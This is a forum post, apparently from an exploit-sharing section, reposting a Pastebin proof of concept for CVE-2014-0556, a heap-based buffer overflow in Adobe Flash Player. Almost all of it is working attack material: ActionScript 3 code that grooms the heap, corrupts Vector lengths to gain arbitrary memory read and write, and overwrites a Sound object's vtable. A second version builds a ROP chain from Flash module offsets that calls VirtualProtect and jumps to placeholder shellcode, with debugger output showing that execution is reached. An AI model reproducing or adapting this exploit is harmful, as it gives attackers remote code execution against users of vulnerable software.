Jump to content
Nytro

CVE-2014-0556 - Heap-based buffer overflow in Adobe Flash Player

By Nytro, in Exploituri

Recommended Posts

Nytro Mentor

Nytro

Posted
Posted

[h=1]CVE-2014-0556[/h]By: hdarwin on Sep 27th, 2014 (edited)

By: [URL="http://pastebin.com/u/hdarwin"]hdarwin[/URL]  on Sep 27th, 2014 (edited)		 		
[LIST=1]/*
<html>
<head>
        <title>CVE-2014-0556</title>  
</head>
<body>
<object id="swf" width="100%"  height="100%" data="NewProject.swf"  type="application/x-shockwave-flash"></object><br>
<button onclick="swf.exploit()">STOP</button>
</body>
</html>
*/
/*
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=0908a008 ebx=02ffa6a0 ecx=0b51f020 edx=4141411c esi=06a62020 edi=06a62020
eip=4141411c esp=02ffa5e4 ebp=02ffa610 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00210202
4141411c ??              ???
*/
package 
{
        import flash.events.*
        import flash.media.*
        import flash.display.*
        import flash.geom.*
        import flash.utils.*
        import flash.text.*
        import flash.system.Capabilities;
        import flash.external.ExternalInterface

        public class Main extends Sprite {
                private var i0:uint
                private var i1:uint
                private var i2:uint
                private var i3:uint
                private var str:String = new String("CVE: CVE-2014-0556\nAuthor: hdarwin (@hdarwin89)\nTested on: Win7 SP1 x86 & " + Capabilities.version)
                private var ba:Vector.<ByteArray> = new Vector.<ByteArray>(3200)
                private var ob:Vector.<Object> = new Vector.<Object>(6400)
                private var bitmap:BitmapData = new BitmapData(0x100, 4, true, 0xffffffff)
                private var rect:Rectangle = new Rectangle(0, 0, 0x100, 4)
                private var snd:Sound
                private var vector:uint
                public function Main():void {

                        for (i0 = 0; i0 < 3200; i0++) {
                                ba[i0] = new ByteArray()
                                ba[i0].length = 0x2000
                                ba[i0].position = 0xfffff000
                        }

                        for (i0 = 0; i0 < 3200; i0++) {
                                if (i0 % 2 == 0) ba[i0] = null
                                ob[i0 * 2] = new Vector.<uint>(1008)
                                ob[i0 * 2 + 1] = new Vector.<uint>(1008)
                        }

                        bitmap.copyPixelsToByteArray(rect, ba[1601])

                        for (i0 = 0; ; i0++)
                                if (ob[i0].length != 1008) break

                        ob[i0][1024 * 3 - 2] = 0xffffffff

                        for (i1 = 0; ; i1++) {
                                if (i0 == i1) continue
                                if (ob[i1].length != 1008) break
                        }

                        ob[i1][0xFFFFFFFE - 1024 * 3] = 0xffffffff
                        ob[i1][0xFFFFFFFE - 1024 * 3 + 1] = ob[i0][1024 * 3 - 1]
                        ob[i0].fixed = true

                        for (i2 = 1000; ; i2++) {
                                if (
                                        ob[i1][0xFFFFFFFF - i2 + 0] == 0 &&
                                        ob[i1][0xFFFFFFFF - i2 + 10] == 1 &&
                                        ob[i1][0xFFFFFFFF - i2 + 5] == ob[i1][0xFFFFFFFF - i2 + 15]
                                ) {
                                                vector = ob[i1][0xFFFFFFFF - i2 + 11]
                                                str += "\n\nVector<uint> Address : " + vector.toString(16)
                                                break
                                }else if (
                                        ob[i1][i2 + 0] == 0 &&
                                        ob[i1][i2 + 10] == 1 &&
                                        ob[i1][i2 + 5] == ob[i1][i2 + 15]
                                        ) {
                                                vector = ob[i1][i2 + 11]
                                                str += "\n\nVector<uint> Address : " + vector.toString(16)
                                                break
                                }
                        }

                        snd = new Sound()

                        for (i2 = 0; i2 < 6400; i2++) {
                                if (i2 == i0 || i2 == i1) continue
                                ob[i2] = null
                                ob[i2] = new Vector.<Object>(1014)
                                ob[i2][0] = snd
                                ob[i2][1] = snd
                        }

                        for (i2 = 0; ; i2++) {
                                if (ob[i0][i2 + 0] == 1014 &&
                                        ob[i0][i2 + 1] == ob[i0][i2 + 2] &&
                                        ob[i0][i2 + 3] == 1
                                ) {
                                        str += "\n\nDump Vector<Object>"
                                        for (i3 = 0; i3 < 20; i3++) {
                                                if (i3 % 4 == 0) str += "\n"
                                                str += zeroPad(ob[i0][i2 + i3 - 9].toString(16), 8) + "\t"
                                        }

                                        str += "\n\nDump Sound Object"
                                        for (i3 = 0; i3 < 20; i3++) {
                                                if (i3 % 4 == 0) str += "\n"
                                                str += zeroPad(read(ob[i0][i2 + 1] - 1 + (4 * i3)).toString(16), 8) + "\t"
                                        }

                                        str += "\n\nDump Sound Object V-Table"
                                        for (i3 = 0; i3 < 20; i3++) {
                                                if (i3 % 4 == 0) str += "\n"
                                                str += zeroPad(read(read(ob[i0][i2 + 1] - 1) + (4 * i3)).toString(16), 8) + "\t"
                                        }

                                        str += "\n\n*** V-Table Modify ***"
                                        write(ob[i0][i2 + 1] - 1, vector + 8)

                                        for (i3 = 0; i3 < 1008; i3++) {
                                                ob[i0][i3] = 0x41414100 | i3
                                        }

                                        str += "\n\nDump Sound Object"
                                        for (i3 = 0; i3 < 20; i3++) {
                                                if (i3 % 4 == 0) str += "\n"
                                                str += zeroPad(read(ob[i0][i2 + 1] - 1 + (4 * i3)).toString(16), 8) + "\t"
                                        }

                                        str += "\n\nDump Sound Object V-Table"
                                        for (i3 = 0; i3 < 20; i3++) {
                                                if (i3 % 4 == 0) str += "\n"
                                                str += zeroPad(read(read(ob[i0][i2 + 1] - 1) + (4 * i3)).toString(16), 8) + "\t"
                                        }
                                        break
                                }
                        }

                        ob[i1][0xFFFFFFFE - 1024 * 3] = 4096
                        ob[i0][1024 * 3 - 2] = 0

                        var tf:TextField = new TextField(); tf.width = 800; tf.height = 800; tf.text = str; addChild(tf)

                        if (ExternalInterface.available) ExternalInterface.addCallback("exploit", exploit)
                }

                private function write(addr:uint, data:uint):void {
                        ob[i0][(addr - vector) / 4 - 2] = data
                }

                private function read(addr:uint):uint {
                        return ob[i0][(addr - vector) / 4 - 2]
                }

                private function zeroPad(number:String, width:int):String {
                        if (number.length < width)
                                return "0" + zeroPad(number, width-1)
                        return number
                }

                public function exploit():void {
                        snd.toString()
                }
        }
}
=============================================================================================================================
/*
<html>
<head>
        <title>CVE-2014-0556</title>  
</head>
<body>
<object id="swf" width="100%"  height="100%" data="NewProject.swf"  type="application/x-shockwave-flash"></object><br>
<button onclick="swf.exploit()">STOP</button>
</body>
</html>
*/
/*
(1728.eb0): Break instruction exception - code 80000003 (first chance)
eax=00000001 ebx=00000201 ecx=08d62fe8 edx=76ee70f4 esi=599dd83f edi=59a31984
eip=08d63048 esp=08d63048 ebp=5a55a3a8 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200202
08d63048 cc              int     3
1:020> dd esp l4
08d63048  cccccccc cccccccc cccccccc cccccccc
1:020> t
eax=00000001 ebx=00000201 ecx=08d62fe8 edx=76ee70f4 esi=599dd83f edi=59a31984
eip=08d63049 esp=08d63048 ebp=5a55a3a8 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200202
08d63049 cc              int     3
1:020> t
eax=00000001 ebx=00000201 ecx=08d62fe8 edx=76ee70f4 esi=599dd83f edi=59a31984
eip=08d6304a esp=08d63048 ebp=5a55a3a8 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200202
08d6304a cc              int     3
1:020> t
eax=00000001 ebx=00000201 ecx=08d62fe8 edx=76ee70f4 esi=599dd83f edi=59a31984
eip=08d6304b esp=08d63048 ebp=5a55a3a8 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200202
08d6304b cc              int     3
1:020> t
eax=00000001 ebx=00000201 ecx=08d62fe8 edx=76ee70f4 esi=599dd83f edi=59a31984
eip=08d6304c esp=08d63048 ebp=5a55a3a8 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200202
08d6304c cc              int     3
*/
package 
{
        import flash.events.*
        import flash.media.*
        import flash.display.*
        import flash.geom.*
        import flash.utils.*
        import flash.text.*
        import flash.external.ExternalInterface

        public class Main extends Sprite {
                private var i0:uint
                private var i1:uint
                private var i2:uint
                private var i3:uint
                private var str:String = new String("CVE: CVE-2014-0556\nAuthor: hdarwin (@hdarwin89)\nTested on: Win7 SP1 x86 & Flash 14.0.0.145")
                private var ba:Vector.<ByteArray> = new Vector.<ByteArray>(3200)
                private var ob:Vector.<Object> = new Vector.<Object>(6400)
                private var bitmap:BitmapData = new BitmapData(0x100, 4, true, 0xffffffff)
                private var rect:Rectangle = new Rectangle(0, 0, 0x100, 4)
                private var snd:Sound
                private var vector:uint
                private var vtable:uint
                private var flash:uint
                public function Main():void {

                        for (i0 = 0; i0 < 3200; i0++) {
                                ba[i0] = new ByteArray()
                                ba[i0].length = 0x2000
                                ba[i0].position = 0xfffff000
                        }

                        for (i0 = 0; i0 < 3200; i0++) {
                                if (i0 % 2 == 0) ba[i0] = null
                                ob[i0 * 2] = new Vector.<uint>(1008)
                                ob[i0 * 2 + 1] = new Vector.<uint>(1008)
                        }

                        bitmap.copyPixelsToByteArray(rect, ba[1601])

                        for (i0 = 0; ; i0++)
                                if (ob[i0].length != 1008) break

                        ob[i0][1024 * 3 - 2] = 0xffffffff

                        for (i1 = 0; ; i1++) {
                                if (i0 == i1) continue
                                if (ob[i1].length != 1008) break
                        }

                        ob[i1][0xFFFFFFFE - 1024 * 3] = 0xffffffff
                        ob[i1][0xFFFFFFFE - 1024 * 3 + 1] = ob[i0][1024 * 3 - 1]
                        ob[i0].fixed = true

                        for (i2 = 1000; ; i2++) {
                                if (ob[i1][0xFFFFFFFF - i2 + 0] == 0 && ob[i1][0xFFFFFFFF - i2 + 10] == 1 && ob[i1][0xFFFFFFFF - i2 + 5] == ob[i1][0xFFFFFFFF - i2 + 15]) {
                                                vector = ob[i1][0xFFFFFFFF - i2 + 11]
                                                break
                                } else if (ob[i1][i2 + 0] == 0 && ob[i1][i2 + 10] == 1 && ob[i1][i2 + 5] == ob[i1][i2 + 15]) {
                                                vector = ob[i1][i2 + 11]
                                                break
                                }
                        }

                        snd = new Sound()

                        for (i2 = 0; i2 < 6400; i2++) {
                                if (i2 == i0 || i2 == i1) continue
                                ob[i2] = null
                                ob[i2] = new Vector.<Object>(1014)
                                ob[i2][0] = snd
                                ob[i2][1] = snd
                        }

                        for (i2 = 0; ; i2++) {
                                if (ob[i0][i2 + 0] == 1014 &&
                                        ob[i0][i2 + 1] == ob[i0][i2 + 2] &&
                                        ob[i0][i2 + 3] == 1
                                ) {
                                        vtable = read(ob[i0][i2 + 1] - 1)
                                        flash = vtable - 0x00c3c1e8 // Flash32_14_0_0_145.ocx
                                        write(ob[i0][i2 + 1] - 1, vector + 0xf54)
                                        for (i3 = 0; i3 < 1008; i3++) {
                                                ob[i0][i3] = 0x41414100 | i3
                                        }
                                        ob[i0][0] = flash + 0x004d6c50 // POP EBP # RETN
                                        ob[i0][1] = flash + 0x004d6c50 // skip 4 bytes
                                        ob[i0][2] = flash + 0x00a21b36 // POP EBX # RETN
                                        ob[i0][3] = 0x00000201 // 0x00000201
                                        ob[i0][4] = flash + 0x008ec368 // POP EDX # RETN
                                        ob[i0][5] = 0x00000040 // 0x00000040
                                        ob[i0][6] = flash + 0x00691119 // POP ECX # RETN
                                        ob[i0][7] = vector + 2000 // Writable location
                                        ob[i0][8] = flash + 0x005986d2 // POP EDI # RETN
                                        ob[i0][9] = flash + 0x00061984 // RETN (ROP NOP)
                                        ob[i0][10] = flash + 0x001bf342 // POP ESI # RETN
                                        ob[i0][11] = flash + 0x0000d83f // JMP [EAX]
                                        ob[i0][12] = flash + 0x000222b5 // POP EAX # RETN
                                        ob[i0][13] = flash + 0x00b8a3a8 // ptr to VirtualProtect()
                                        ob[i0][14] = flash + 0x00785916 // PUSHAD # RETN
                                        ob[i0][15] = flash + 0x0017b966 // ptr to 'jmp esp'
                                        ob[i0][16] = 0xcccccccc // shellcode
                                        ob[i0][17] = 0xcccccccc // shellcode
                                        ob[i0][18] = 0xcccccccc // shellcode
                                        ob[i0][19] = 0xcccccccc // shellcode
                                        ob[i0][979] = flash + 0x0029913A // POP EAX # RETN
                                        ob[i0][980] = 0x00000f58
                                        ob[i0][981] = flash + 0x00195558 // PUSH ESP # POP ESI # RETN
                                        ob[i0][982] = flash + 0x0036B3B2 // SUB ESI,EAX # POP ECX # MOV EAX,ESI # POP ESI # RETN
                                        ob[i0][985] = flash + 0x0095024c // XCHG EAX,ESP # RETN
                                        ob[i0][1007] = flash + 0x0095024c // XCHG EAX,ESP # RETN
                                        break
                                }
                        }

                        ob[i1][0xFFFFFFFE - 1024 * 3] = 4096
                        ob[i0][1024 * 3 - 2] = 0
                        str += flash.toString(16)
                        var tf:TextField = new TextField(); tf.width = 800; tf.height = 800; tf.text = str; addChild(tf)

                        if (ExternalInterface.available) ExternalInterface.addCallback("exploit", exploit)
                }

                private function write(addr:uint, data:uint):void {
                        ob[i0][(addr - vector) / 4 - 2] = data
                }

                private function read(addr:uint):uint {
                        return ob[i0][(addr - vector) / 4 - 2]
                }

                private function zeroPad(number:String, width:int):String {
                        if (number.length < width)
                                return "0" + zeroPad(number, width-1)
                        return number
                }

                public function exploit():void {
                        snd.toString()
                }
        }
}
[/LIST]

Sursa: [ActionScript 3] CVE-2014-0556 - Pastebin.com

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...